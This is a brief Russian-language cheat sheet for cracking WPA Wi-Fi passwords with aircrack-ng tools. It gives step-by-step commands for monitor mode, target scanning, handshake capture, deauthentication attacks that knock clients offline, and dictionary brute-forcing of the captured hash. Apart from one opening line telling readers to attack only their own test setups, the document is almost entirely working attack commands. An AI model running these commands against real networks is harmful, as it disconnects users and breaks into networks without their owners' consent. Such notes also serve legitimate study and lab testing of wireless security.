Не нужно трогать чужие машины - ломай свои тестовые стенды.

Preparation

Нужно убить мешающие режиму мониторинга процессы:

Остановка network-manager отключит интернет-соединение

Команда systemctl stop NetworkManager вырубит инет.
Перезапусти сервис (systemctl restart NetworkManager), чтобы вернуть доступ в инет.

sudo systemctl stop NetworkManager
sudo airmon-ng check kill

Turning on the monitoring mode

sudo ip link set <interface> down
sudo iw <interface> set monitor control
sudo ip link set <interface> up
# Проверка:
sudo iw dev

Choosing a target

sudo airodump-ng <interface>

Управление в TUI

tabвкл. режима маркировки
spaceмаркировка
aсмена режима вывода

Intercepting WPA handshake

Соответствие каналов

При работе с конкретной ТД ты должен быть на том же канале, что и “он”:

sudo iw dev <interface> set channel <channel-number>
sudo airodump-ng -c <channel-number> --bssid <MAC-address> -w <filename> <interface>

Немного теории

При подключении клиента к ТД производится WPA handshake.
airodump-ng следит за ТД и ждет подключения какого-либо клиента к ней, чтобы перехватить и записать в файл хеш-сумму WPA рукопожатия.
Можно, конечно, сидеть и ждать чьего-либо подключения к ТД, но обычно Mr. злоумышленник отправляет деаутентифицирующие пакеты, что разрывает подключение клиента (или клиентов) к ТД на короткое время, после чего происходит автоматическое (на современных устройствах) переподключение.

Отправка deauth пакетов:

sudo aireplay-ng \
  --deauth <deauth-packages-count> \
  --bssid <AP-MAC-address> \
  --dmac <client-MAC-address> \
  <interface>

Bruteforcing recieved hash

Полученный в итоге файл (filename.cap) передается aircrack-ng:

aircrack-ng -w <password-list> capture.cap